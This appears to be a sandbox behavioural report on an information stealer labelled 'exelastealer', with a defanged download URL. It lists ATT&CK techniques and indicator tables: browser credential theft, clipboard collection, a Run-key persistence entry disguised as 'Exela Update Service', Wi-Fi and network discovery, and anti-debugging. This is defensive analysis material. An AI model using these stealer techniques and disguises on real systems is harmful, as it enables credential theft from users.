exelastealer | hxxps://ify[.]ac/1YYx

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-67687450-2252871228-2016797368-1000\Control Panel\International\Geo\Nation	Nursultan (1).exe
Key value queried	\REGISTRY\USER\S-1-5-21-67687450-2252871228-2016797368-1000\Control Panel\International\Geo\Nation	Nursultan (1).exe
Key value queried	\REGISTRY\USER\S-1-5-21-67687450-2252871228-2016797368-1000\Control Panel\International\Geo\Nation	Nursultan (1).exe
Key value queried	\REGISTRY\USER\S-1-5-21-67687450-2252871228-2016797368-1000\Control Panel\International\Geo\Nation	Nursultan (1).exe

Clipboard Data 1 TTPs 6 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4480	cmd.exe
3592	powershell.exe
5984	cmd.exe
1528	powershell.exe
3776	cmd.exe
1656	powershell.exe

Executes dropped EXE 20 IoCs

pid	Process
3468	Nursultan (1).exe
3740	ParadiseInJector.exe
1620	ParadiseServices.exe
4296	ParadiseInJector.exe
5604	Nurik.exe
2944	Nursultan (1).exe
3472	ParadiseInJector.exe
3616	ParadiseServices.exe
2192	Nurik.exe
5900	ParadiseInJector.exe
1972	Nursultan (1).exe
4376	ParadiseInJector.exe
2092	ParadiseServices.exe
3860	ParadiseInJector.exe
936	Nurik.exe
3840	Nursultan (1).exe
4544	ParadiseInJector.exe
3804	Nurik.exe
2292	ParadiseServices.exe
3848	ParadiseInJector.exe

Loads dropped DLL 64 IoCs

pid	Process
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
4296	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
5900	ParadiseInJector.exe
4296	ParadiseInJector.exe
3860	ParadiseInJector.exe
3860	ParadiseInJector.exe
3860	ParadiseInJector.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe"	reg.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Nurik.exe

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\E:	Nurik.exe
File opened (read-only)	\??\F:	Nurik.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
225	ip-api.com

Network Service Discovery 1 TTPs 6 IoCs

Attempt to gather information on host's network.

Network Service Discovery

T1046

pid	Process
4324	cmd.exe
3684	ARP.EXE
2252	cmd.exe
5344	ARP.EXE
2384	cmd.exe
3708	ARP.EXE

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Enumerates processes with tasklist 1 TTPs 15 IoCs

persistence privilege_escalation

Process Discovery

T1057

pid	Process
2256	tasklist.exe
5792	tasklist.exe
2380	tasklist.exe
5708	tasklist.exe
1160	tasklist.exe
4764	tasklist.exe
1700	tasklist.exe
4544	tasklist.exe
4016	tasklist.exe
456	tasklist.exe
392	tasklist.exe
3940	tasklist.exe
948	tasklist.exe
4012	tasklist.exe
4960	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
5604	Nurik.exe
5604	Nurik.exe
2192	Nurik.exe
2192	Nurik.exe
936	Nurik.exe
936	Nurik.exe
3804	Nurik.exe
3804	Nurik.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4296-993-0x00007FFF77850000-0x00007FFF77E38000-memory.dmp	upx
behavioral1/memory/4296-1009-0x00007FFF968A0000-0x00007FFF968AF000-memory.dmp	upx
behavioral1/memory/4296-1011-0x00007FFF95ED0000-0x00007FFF95EDD000-memory.dmp	upx
behavioral1/memory/4296-1010-0x00007FFF8FB40000-0x00007FFF8FB59000-memory.dmp	upx
behavioral1/memory/4296-1015-0x00007FFF7CDA0000-0x00007FFF7CF13000-memory.dmp	upx
behavioral1/memory/4296-1017-0x00007FFF79450000-0x00007FFF797C5000-memory.dmp	upx
behavioral1/memory/4296-1018-0x00007FFF7CCE0000-0x00007FFF7CD98000-memory.dmp	upx
behavioral1/memory/4296-1016-0x00007FFF8D010000-0x00007FFF8D03E000-memory.dmp	upx
behavioral1/memory/4296-1014-0x00007FFF8D1A0000-0x00007FFF8D1C3000-memory.dmp	upx
behavioral1/memory/4296-1013-0x00007FFF8D1D0000-0x00007FFF8D1FD000-memory.dmp	upx
behavioral1/memory/4296-1012-0x00007FFF8FAB0000-0x00007FFF8FAC9000-memory.dmp	upx
behavioral1/files/0x0007000000027ff9-1008.dat	upx
behavioral1/files/0x0007000000027ff4-1007.dat	upx
behavioral1/memory/4296-1021-0x00007FFF91F50000-0x00007FFF91F62000-memory.dmp	upx
behavioral1/memory/4296-1020-0x00007FFF943C0000-0x00007FFF943D5000-memory.dmp	upx
behavioral1/memory/4296-1037-0x00007FFF8D2F0000-0x00007FFF8D30B000-memory.dmp	upx
behavioral1/memory/4296-1036-0x00007FFF8D200000-0x00007FFF8D224000-memory.dmp	upx
behavioral1/memory/4296-1040-0x00007FFF8CFA0000-0x00007FFF8CFED000-memory.dmp	upx
behavioral1/memory/4296-1048-0x00007FFF79450000-0x00007FFF797C5000-memory.dmp	upx
behavioral1/memory/4296-1047-0x00007FFF8CEA0000-0x00007FFF8CEBE000-memory.dmp	upx
behavioral1/memory/4296-1046-0x00007FFF8D010000-0x00007FFF8D03E000-memory.dmp	upx
behavioral1/memory/4296-1045-0x00007FFF91F00000-0x00007FFF91F0A000-memory.dmp	upx
behavioral1/memory/4296-1044-0x00007FFF8CEC0000-0x00007FFF8CEF2000-memory.dmp	upx
behavioral1/memory/4296-1043-0x00007FFF8CF00000-0x00007FFF8CF11000-memory.dmp	upx
behavioral1/memory/4296-1042-0x00007FFF7CDA0000-0x00007FFF7CF13000-memory.dmp	upx
behavioral1/memory/4296-1041-0x00007FFF8D1A0000-0x00007FFF8D1C3000-memory.dmp	upx
behavioral1/memory/4296-1051-0x00007FFF8CBD0000-0x00007FFF8CC07000-memory.dmp	upx
behavioral1/memory/4296-1049-0x00007FFF7D420000-0x00007FFF7DC1B000-memory.dmp	upx
behavioral1/memory/4296-1050-0x00007FFF7CCE0000-0x00007FFF7CD98000-memory.dmp	upx
behavioral1/memory/4296-1039-0x00007FFF8D2D0000-0x00007FFF8D2E9000-memory.dmp	upx
behavioral1/memory/4296-1038-0x00007FFF8FB40000-0x00007FFF8FB59000-memory.dmp	upx
behavioral1/memory/4296-1035-0x00007FFF91F10000-0x00007FFF91F24000-memory.dmp	upx
behavioral1/memory/4296-1034-0x00007FFF8D310000-0x00007FFF8D42C000-memory.dmp	upx
behavioral1/memory/4296-1033-0x00007FFF8D430000-0x00007FFF8D452000-memory.dmp	upx
behavioral1/memory/4296-1032-0x00007FFF91F30000-0x00007FFF91F44000-memory.dmp	upx
behavioral1/memory/4296-1031-0x00007FFF77850000-0x00007FFF77E38000-memory.dmp	upx
behavioral1/files/0x0007000000027ff2-1006.dat	upx
behavioral1/files/0x0007000000027ff3-1005.dat	upx
behavioral1/memory/4296-1004-0x00007FFF8D200000-0x00007FFF8D224000-memory.dmp	upx
behavioral1/files/0x0007000000027fc9-1002.dat	upx
behavioral1/files/0x0007000000027ffb-989.dat	upx
behavioral1/memory/4296-1055-0x00007FFF91F50000-0x00007FFF91F62000-memory.dmp	upx
behavioral1/memory/4296-1054-0x00007FFF943C0000-0x00007FFF943D5000-memory.dmp	upx
behavioral1/memory/4296-1067-0x00007FFF8D430000-0x00007FFF8D452000-memory.dmp	upx
behavioral1/memory/4296-1114-0x00007FFF8D2F0000-0x00007FFF8D30B000-memory.dmp	upx
behavioral1/memory/5900-1115-0x00007FFF77260000-0x00007FFF77848000-memory.dmp	upx
behavioral1/memory/5900-1120-0x00007FFF8F8B0000-0x00007FFF8F8BD000-memory.dmp	upx
behavioral1/memory/4296-1119-0x00007FFF8CFA0000-0x00007FFF8CFED000-memory.dmp	upx
behavioral1/memory/5900-1123-0x00007FFF7A550000-0x00007FFF7A6C3000-memory.dmp	upx
behavioral1/memory/5900-1125-0x00007FFF840C0000-0x00007FFF840E3000-memory.dmp	upx
behavioral1/memory/5900-1126-0x00007FFF83AB0000-0x00007FFF83ADE000-memory.dmp	upx
behavioral1/memory/4296-1124-0x00007FFF7D420000-0x00007FFF7DC1B000-memory.dmp	upx
behavioral1/memory/5900-1122-0x00007FFF840F0000-0x00007FFF8411D000-memory.dmp	upx
behavioral1/memory/5900-1129-0x00007FFF7CC20000-0x00007FFF7CCD8000-memory.dmp	upx
behavioral1/memory/4296-1128-0x00007FFF8CBD0000-0x00007FFF8CC07000-memory.dmp	upx
behavioral1/memory/5900-1132-0x00007FFF7DE70000-0x00007FFF7DE84000-memory.dmp	upx
behavioral1/memory/5900-1135-0x00007FFF77260000-0x00007FFF77848000-memory.dmp	upx
behavioral1/memory/5900-1137-0x00007FFF8C190000-0x00007FFF8C1A9000-memory.dmp	upx
behavioral1/memory/5900-1138-0x00007FFF8CE40000-0x00007FFF8CE5B000-memory.dmp	upx
behavioral1/memory/5900-1136-0x00007FFF7A170000-0x00007FFF7A28C000-memory.dmp	upx
behavioral1/memory/5900-1140-0x00007FFF7A550000-0x00007FFF7A6C3000-memory.dmp	upx
behavioral1/memory/5900-1147-0x00007FFF75FA0000-0x00007FFF76315000-memory.dmp	upx
behavioral1/memory/5900-1148-0x00007FFF72220000-0x00007FFF72A1B000-memory.dmp	upx
behavioral1/memory/5900-1146-0x00007FFF8CAC0000-0x00007FFF8CADE000-memory.dmp	upx

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe
File opened for modification	C:\Windows\SystemTemp	msedgewebview2.exe

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5504	sc.exe
5784	sc.exe
1356	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000a000000027fc1-936.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 27 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Nursultan (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Nursultan (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Nursultan (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Nursultan (1).exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 6 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

Wi-Fi Discovery

T1016.002

pid	Process
3284	cmd.exe
3980	netsh.exe
5472	cmd.exe
1724	netsh.exe
6020	cmd.exe
772	netsh.exe

System Network Connections Discovery 1 TTPs 3 IoCs

Attempt to get a listing of network connections.

System Network Connections Discovery

T1049

pid	Process
4424	NETSTAT.EXE
3840	NETSTAT.EXE
4516	NETSTAT.EXE

Collects information from the system 1 TTPs 3 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
4460	WMIC.exe
1160	WMIC.exe
4780	WMIC.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
5356	WMIC.exe
2956	WMIC.exe
5192	WMIC.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedgewebview2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedgewebview2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedgewebview2.exe

Gathers network information 2 TTPs 6 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command and Scripting Interpreter

T1059

pid	Process
3672	ipconfig.exe
4516	NETSTAT.EXE
4700	ipconfig.exe
4424	NETSTAT.EXE
5012	ipconfig.exe
3840	NETSTAT.EXE

Gathers system information 1 TTPs 3 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
416	systeminfo.exe
324	systeminfo.exe
1972	systeminfo.exe

Kills process with taskkill 8 IoCs

defense_evasion

pid	Process
3276	taskkill.exe
1032	taskkill.exe
4356	taskkill.exe
2080	taskkill.exe
2272	taskkill.exe
1504	taskkill.exe
5040	taskkill.exe
2872	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133842758688170268"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedgewebview2.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-67687450-2252871228-2016797368-1000_Classes\Local Settings	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3740	msedge.exe
3740	msedge.exe
6024	msedge.exe
6024	msedge.exe
772	identity_helper.exe
772	identity_helper.exe
5080	chrome.exe
5080	chrome.exe
1972	msedge.exe
1972	msedge.exe
1972	msedge.exe
1972	msedge.exe
1956	chrome.exe
1956	chrome.exe
1956	chrome.exe
1956	chrome.exe
2956	WMIC.exe
2956	WMIC.exe
2956	WMIC.exe
2956	WMIC.exe
4104	WMIC.exe
4104	WMIC.exe
4104	WMIC.exe
4104	WMIC.exe
5604	Nurik.exe
5604	Nurik.exe
4196	WMIC.exe
4196	WMIC.exe
4196	WMIC.exe
4196	WMIC.exe
4600	WMIC.exe
4600	WMIC.exe
4600	WMIC.exe
4600	WMIC.exe
2192	Nurik.exe
2192	Nurik.exe
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe
4460	WMIC.exe
4460	WMIC.exe
4460	WMIC.exe
4460	WMIC.exe
5656	WMIC.exe
5656	WMIC.exe
5656	WMIC.exe
5656	WMIC.exe
8	WMIC.exe
8	WMIC.exe
8	WMIC.exe
8	WMIC.exe
3592	WMIC.exe
3592	WMIC.exe
3592	WMIC.exe
3592	WMIC.exe
3476	WMIC.exe
3476	WMIC.exe
3476	WMIC.exe
3476	WMIC.exe
5192	WMIC.exe
5192	WMIC.exe
5192	WMIC.exe
5192	WMIC.exe
936	Nurik.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2944	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs

pid	Process
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
6024	msedge.exe
5080	chrome.exe
5808	msedgewebview2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe
Token: SeShutdownPrivilege	5080	chrome.exe
Token: SeCreatePagefilePrivilege	5080	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
5080	chrome.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
1972	Nursultan (1).exe
4376	ParadiseInJector.exe
3860	ParadiseInJector.exe
936	Nurik.exe
3840	Nursultan (1).exe
4544	ParadiseInJector.exe
3848	ParadiseInJector.exe
3804	Nurik.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 6024 wrote to memory of 3796	6024	msedge.exe	87
PID 6024 wrote to memory of 3796	6024	msedge.exe	87
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
